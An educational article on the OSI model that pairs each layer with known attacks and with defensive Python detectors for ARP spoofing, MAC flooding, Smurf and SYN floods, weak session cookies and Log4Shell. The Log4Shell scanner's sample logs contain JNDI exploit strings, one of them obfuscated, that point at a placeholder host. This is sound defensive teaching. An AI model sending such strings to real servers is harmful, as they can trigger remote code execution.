The OSI model is the conceptual backbone that breaks down the complexity of network communication into seven distinct layers. While real-world environments often rely on the TCP/IP model, OSI remains essential for understanding, classifying, and defending systems against cyberattacks.
Each layer represents a specific set of functions but also exposes particular attack vectors and requires dedicated defensive measures. Understanding how each level relates to real-world threats allows for more precise security controls, reduced attack surface, and faster, more effective incident response.

Layer 1 – Physical
This is the lowest layer, responsible for transmitting binary data over the physical medium (electrical signals, light pulses, or radio waves). It defines aspects like cabling, connectors, topology, and signal modulation.
An attacker disrupting a Wi-Fi network with a jamming device operates at this layer. Similarly, physical tapping into an Ethernet cable to intercept data without detection is a layer 1 attack. In critical infrastructures, fiber optic links have been sabotaged or manipulated to degrade or cut communication, a known industrial sabotage tactic.
Layer 2 – Data Link
This layer governs access to the physical medium using MAC addresses, frames, and error control mechanisms. In local networks, it enforces how devices take turns to transmit.
A classic example is ARP spoofing, where an attacker sends fake ARP responses to associate their MAC address with the gateway’s IP, redirecting all traffic through themselves (MITM). MAC flooding is another example, overloading a switch’s CAM table with bogus MACs, forcing it to broadcast traffic like a hub. These techniques have been used in internal pentests to expose poor LAN segmentation.
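The two layer 2 techniques above leave a recognisable trace that a passive LAN monitor can pick up: one IP answered by two different MACs, and one switch port sourcing far more MACs than a single host would. The following is an added example (it is not code from the original article) that runs that detection over a constructed set of ARP replies and frame headers; the port names, addresses and thresholds are invented for illustration.

```python
from collections import defaultdict

# Constructed sample (not real captures): ARP replies seen by a passive monitor
# on the LAN, as (timestamp, switch port, sender IP, sender MAC). The gateway
# 192.168.1.1 is first answered by its real MAC, then claimed by a second MAC.
ARP_REPLIES = [
    (1.0, "Gi0/1", "192.168.1.1", "aa:bb:cc:00:00:01"),
    (1.5, "Gi0/2", "192.168.1.10", "aa:bb:cc:00:00:10"),
    (2.0, "Gi0/3", "192.168.1.1", "de:ad:be:ef:00:99"),   # conflicting claim
    (2.1, "Gi0/3", "192.168.1.1", "de:ad:be:ef:00:99"),   # repeated, reported once
    (3.0, "Gi0/4", "192.168.1.20", "aa:bb:cc:00:00:20"),
]

# Constructed sample: (switch port, source MAC) of frames; port Gi0/3 sources
# 500 distinct MACs in a short window, far beyond what one host would send.
FRAMES = [("Gi0/3", f"02:00:00:00:{i // 256:02x}:{i % 256:02x}") for i in range(500)]
FRAMES += [("Gi0/2", "aa:bb:cc:00:00:10")] * 5


def detect_arp_conflicts(replies, protected_ips=("192.168.1.1",)):
    """Flag any IP answered by more than one MAC. Conflicts on protected IPs
    (gateway, DNS) get HIGH severity because they redirect everyone's traffic."""
    first_seen = {}          # ip -> MAC from the first reply
    reported = set()         # (ip, mac) pairs already alerted
    alerts = []
    for ts, port, ip, mac in replies:
        if ip not in first_seen:
            first_seen[ip] = mac
            continue
        if first_seen[ip] != mac and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append({
                "severity": "HIGH" if ip in protected_ips else "MEDIUM",
                "ip": ip, "expected": first_seen[ip], "observed": mac,
                "port": port, "time": ts,
            })
    return alerts


def detect_mac_flood(frames, max_macs_per_port=50):
    """Return ports whose count of distinct source MACs exceeds the threshold,
    the signature of a CAM-table exhaustion attempt."""
    macs_per_port = defaultdict(set)
    for port, mac in frames:
        macs_per_port[port].add(mac)
    return {p: len(m) for p, m in macs_per_port.items() if len(m) > max_macs_per_port}


if __name__ == "__main__":
    for a in detect_arp_conflicts(ARP_REPLIES):
        print(f"[{a['severity']}] {a['ip']} expected {a['expected']} saw {a['observed']} on {a['port']}")
    print("possible MAC flood:", detect_mac_flood(FRAMES))
```

On a managed switch the same two signals are what Dynamic ARP Inspection and port security (a per-port limit on learned MACs) enforce in hardware; the script is the software equivalent for a span port or a monitoring host, and the 50-MAC threshold should be tuned to what the port legitimately carries (a hypervisor uplink sources many more MACs than an access port).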
Layer 3 – Network
Responsible for routing packets between different networks using IP addresses and protocols like ICMP, IPsec, and BGP.
In 2008, Pakistan Telecom (PTCL) accidentally, or deliberately, announced a BGP route for YouTube, redirecting global traffic into its network. This BGP hijacking incident took YouTube offline globally. Smurf attacks are another example, where ICMP echo requests are sent to an entire subnet with a spoofed source IP, flooding the target with replies.
Layer 4 – Transport
Manages reliable end-to-end communications between processes. TCP provides ordered, reliable delivery; UDP offers fast, connectionless transmission.
SYN flood attacks send a barrage of half-open TCP handshakes, exhausting server resources. TCP reset attacks can inject RST packets to cut active connections. UDP flooding can disrupt services like VoIP or SCADA systems if rate-limiting is not in place.
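Both the layer 3 Smurf attack and the layer 4 SYN flood described above can be spotted from flow summaries alone: ICMP echo requests aimed at a subnet's broadcast address, and TCP SYNs that are never followed by the client's ACK. The following is an added example (not code from the original article) that applies both checks to a constructed packet list; the addresses, the local subnet and the thresholds are assumptions chosen for illustration.

```python
import ipaddress
from collections import Counter

# Constructed packet summaries (not real traffic) in the shape a flow monitor
# or IDS would export: (protocol, source IP, destination IP, info), where info
# is the ICMP type or the TCP flag of interest.
PACKETS = [
    ("icmp", "10.0.0.5", "10.0.0.255", "echo-request"),  # echo to the subnet broadcast
    ("icmp", "10.0.0.5", "10.0.0.255", "echo-request"),
    ("icmp", "10.0.0.7", "10.0.0.1", "echo-request"),    # an ordinary ping
    ("tcp", "10.0.0.7", "10.0.0.80", "SYN"),             # two completed handshakes
    ("tcp", "10.0.0.7", "10.0.0.80", "ACK"),
    ("tcp", "10.0.0.8", "10.0.0.80", "SYN"),
    ("tcp", "10.0.0.8", "10.0.0.80", "ACK"),
]
# 150 SYNs from distinct sources to the web server, none followed by an ACK.
PACKETS += [("tcp", f"203.0.113.{i}", "10.0.0.80", "SYN") for i in range(1, 151)]


def smurf_candidates(packets, local_net="10.0.0.0/24", min_count=2):
    """Sources sending echo requests to the directed-broadcast address of the
    local subnet. In a Smurf attack that source field is the spoofed victim."""
    net = ipaddress.ip_network(local_net)
    hits = Counter()
    for proto, src, dst, info in packets:
        if proto == "icmp" and info == "echo-request" \
                and ipaddress.ip_address(dst) == net.broadcast_address:
            hits[src] += 1
    return {src: n for src, n in hits.items() if n >= min_count}


def half_open_by_target(packets, threshold=100):
    """Count (src, dst) pairs that sent a SYN but never an ACK, per destination,
    and report destinations above the threshold: the SYN-flood signature."""
    syn, acked = set(), set()
    for proto, src, dst, info in packets:
        if proto != "tcp":
            continue
        if info == "SYN":
            syn.add((src, dst))
        elif info == "ACK":
            acked.add((src, dst))
    half_open = Counter(dst for (_, dst) in syn - acked)
    return {dst: n for dst, n in half_open.items() if n >= threshold}


if __name__ == "__main__":
    print("smurf candidates:", smurf_candidates(PACKETS))
    print("SYN flood targets:", half_open_by_target(PACKETS))
```

The half-open count is exactly the resource the flood exhausts, so the same metric drives the mitigation: Linux SYN cookies (`net.ipv4.tcp_syncookies`) stop allocating state for SYNs the kernel has not seen acknowledged, and routers with directed-broadcast forwarding disabled never turn the broadcast echo into a reply storm in the first place.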
Layer 5 – Session
Establishes, maintains, and terminates sessions between applications. Though often intertwined with layer 4 in real implementations, it remains key for long-lived, stateful connections like SSH or SIP.
Session hijacking involves stealing a valid session token (e.g., from an unprotected cookie) and reusing it to impersonate a legitimate user. These attacks were common before HTTPS and HttpOnly flags became standard.
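The cookie attributes the paragraph refers to are visible in every `Set-Cookie` header a server emits, so the weakness can be audited from a response alone. The following is an added example (not from the original article) that parses `Set-Cookie` headers and reports which protections a session cookie lacks; the cookie names it treats as session cookies and the sample headers are constructed for illustration.

```python
# Constructed Set-Cookie headers (not from a real application).
WEAK_HEADER = "sessionid=abc123; Path=/"
HARDENED_HEADER = "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Strict"
NON_SESSION_HEADER = "theme=dark; Path=/"

# Names commonly used for session cookies; extend for the application under review.
SESSION_COOKIE_NAMES = ("sessionid", "jsessionid", "phpsessid", "asp.net_sessionid")


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value|True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Flag attributes (Secure, HttpOnly) carry no value; record them as True.
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_session_cookie(header, session_names=SESSION_COOKIE_NAMES):
    """Return a list of findings for a session cookie; [] means no issue found
    (also [] for cookies that are not session cookies)."""
    name, _, attrs = parse_set_cookie(header)
    if name.lower() not in session_names:
        return []
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: token readable by script, so XSS becomes token theft")
    if "secure" not in attrs:
        findings.append("missing Secure: token may be sent over plaintext HTTP")
    samesite = str(attrs.get("samesite", "")).lower()
    if samesite not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: cross-site requests carry the token")
    return findings


if __name__ == "__main__":
    for h in (WEAK_HEADER, HARDENED_HEADER, NON_SESSION_HEADER):
        print(h, "->", audit_session_cookie(h) or "ok")
```

Run it against the headers of a real login response (for example from a proxy or a browser's network tab) to get the same three-item checklist; a session cookie that passes it still needs a server-side expiry and rotation on login, which no header attribute can provide.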
Layer 6 – Presentation
Handles data translation into a common format: encoding (ASCII, UTF-8), compression, and especially encryption.
Attacks like POODLE (Padding Oracle On Downgraded Legacy Encryption) forced a downgrade from TLS to SSLv3, allowing attackers to decrypt protected traffic. Heartbleed exploited a bounds-checking bug in OpenSSL, leaking memory contents including certificates, private keys, and credentials, a serious vulnerability in layer 6.
Layer 7 – Application
Closest to the user, this layer includes high-level protocols like HTTP, SMTP, DNS, FTP, and any exposed API or service.
The Log4Shell vulnerability (CVE-2021-44228) allowed remote code execution via crafted strings passed through HTTP headers, exploiting unsafe logging in Java applications. This kind of flaw stems from trusting user input without sanitization. Other common attacks include SQL injection, cross-site scripting (XSS), file upload abuse, and DNS misconfigurations.
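Because the Log4Shell trigger is a lookup string that lands in a log line, the first place a defender sees it is the web server or proxy log. The following is an added example (not code from the original article) that scans constructed access-log lines for JNDI lookups in request fields, collapsing nested lookups first so that a keyword split across inner lookups is still recognised; the log format, the hostnames (`placeholder.invalid`) and the client addresses are assumptions made for the example.

```python
import re

# Constructed access-log-style lines (not real traffic): client IP, quoted
# request line, then selected headers as key="value".
LOG_LINES = [
    '10.0.0.5 "GET /index.html" ua="Mozilla/5.0"',
    '203.0.113.4 "GET /login" ua="${jndi:ldap://placeholder.invalid/a}"',
    '203.0.113.4 "GET /login" x-api-version="${${lower:j}ndi:rmi://placeholder.invalid/a}"',
    '10.0.0.8 "GET /search?q=${date:yyyy}" ua="curl/8.0"',
]

# An innermost ${name:value} lookup (no further ${ inside it).
LOOKUP = re.compile(r"\$\{([^${}:]*):([^${}]*)\}")
# The lookup type that reaches out to a remote naming service.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
FIELD = re.compile(r'(\w[\w-]*)="([^"]*)"')
REQUEST = re.compile(r'"([^"]*)"')


def is_jndi_lookup(text, max_rounds=10):
    """True if the text contains a ${jndi:...} lookup, directly or after
    collapsing inner lookups to their literal value (innermost first)."""
    for _ in range(max_rounds):
        if JNDI.search(text):
            return True
        collapsed = LOOKUP.sub(lambda m: m.group(2), text)
        if collapsed == text:      # nothing left to collapse
            return False
        text = collapsed
    return False


def scan_log(lines):
    """Return (client IP, field name) for every request field carrying a JNDI lookup."""
    hits = []
    for line in lines:
        src = line.split(maxsplit=1)[0]
        req = REQUEST.search(line)
        fields = [("request", req.group(1))] if req else []
        fields += FIELD.findall(line)
        for name, value in fields:
            if is_jndi_lookup(value):
                hits.append((src, name))
    return hits


if __name__ == "__main__":
    for src, field in scan_log(LOG_LINES):
        print(f"JNDI lookup from {src} in field {field}")
```

Detection of this kind is for triage, not protection: the fix is to run a patched Log4j release, and on versions that support it the `log4j2.formatMsgNoLookups` property was published as an interim measure. The benign `${date:yyyy}` line shows why the scanner keys on the lookup type rather than on `${` alone, which would flood the alert queue with false positives from legitimate templating.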

Structured Examples: Attacks and Defenses by Layer
Traditional firewalls, such as iptables, Fortinet, or Cisco ASA, primarily operate at layers 3 (IP) and 4 (TCP/UDP). They filter traffic by source, destination, and port, preventing unauthorized access, blocking scans, or restricting inter-subnet communications.
A WAF (Web Application Firewall) works at layer 7, inspecting HTTP requests, headers, parameters, and payloads. It detects and blocks XSS, SQL injection, malicious uploads, and abuse of vulnerable endpoints.
IDS/IPS systems (e.g., Suricata, Snort) can inspect traffic across multiple layers:
- Detecting scans (layer 3 and 4),
- Recognizing ARP poisoning (layer 2),
- Identifying TLS downgrade attempts (layer 6),
- Blocking web exploits in HTTP traffic (layer 7).
TLS interception proxies inspect and re-encrypt HTTPS traffic, operating at layers 6 and 7, useful in enterprise security, though controversial in terms of privacy and compliance.
Network Access Control (NAC) systems like Cisco ISE operate at layer 2, managing device access using MAC addresses, posture assessment, or 802.1X authentication.
VPN technologies (IPsec, OpenVPN, WireGuard) encapsulate traffic from layer 3 upward, providing confidentiality, authentication, and integrity, especially important over untrusted networks.

Understanding the OSI model is not academic nostalgia; it is a practical necessity. In hybrid environments, cloud ecosystems, and segmented networks, applying controls per layer is key to implementing effective defense-in-depth strategies. Lower layers require physical protection and segmentation, mid-layers need route filtering and protocol inspection, and upper layers demand rigorous input validation, strong authentication, and secure-by-design application architecture.
The OSI model remains the most effective mental framework for mapping how data flows, and where it breaks. It’s only by knowing how the system is structured that we can anticipate how it may be compromised.